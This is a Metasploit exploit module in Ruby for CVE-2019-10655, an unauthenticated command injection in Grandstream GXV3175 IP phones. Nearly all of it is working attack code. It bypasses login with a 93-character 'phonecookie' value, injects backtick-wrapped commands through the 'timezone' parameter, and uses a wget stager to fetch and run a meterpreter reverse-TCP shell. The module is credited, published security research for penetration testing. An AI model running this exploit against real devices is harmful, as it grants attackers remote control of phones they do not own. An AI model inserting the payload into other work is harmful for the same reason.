Grandstream GXV3175 Unauthenticated Command Execution Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
        'Description' => %q{
          This module exploits a command injection vulnerability in Grandstream GXV3175
          IP multimedia phones. The 'settimezone' action does not validate input in the
          'timezone' parameter allowing injection of arbitrary commands.

          A buffer overflow in the 'phonecookie' cookie parsing allows authentication
          to be bypassed by providing an alphanumeric cookie 93 characters in length.

          This module was tested successfully on Grandstream GXV3175v2
          hardware revision V2.6A with firmware version 1.0.1.19.
        },
        'Author' => [
          'alhazred', # Command injection vulnerability discovery and exploit
          'Brendan Scarvell', # Auth bypass discovery
          'bcoles' # Metasploit
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'References' => [
          [ 'CVE', '2019-10655' ],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
          [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DisclosureDate' => '2016-09-01',
        'Privileged' => true,
        'Arch' => ARCH_ARMLE,
        'DefaultOptions' => {
          'PrependFork' => true,
          'MeterpreterTryToFork' => true,
          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget'
        },
        'CmdStagerFlavor' => %w[wget],
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultTarget' => 0
      )
    )
  end

  def check
    res = send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => {
        'action' => 'settimezone',
        'timezone' => ''
      }
    )

    if res && res.code == 200 && res.body.to_s.include?('Response=Success')
      return CheckCode::Detected('phonecookie authentication bypassed successfully.')
    end

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    res = send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => {
        'action' => 'settimezone',
        'timezone' => "`#{cmd}`"
      }
    )
    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
    end
    unless res.body.to_s.include?('Response=Success')
      fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
    end
  end

  def exploit
    execute_cmdstager(
      linemax: 220, # 255 minus URL encoding
      background: true
    )
  end
end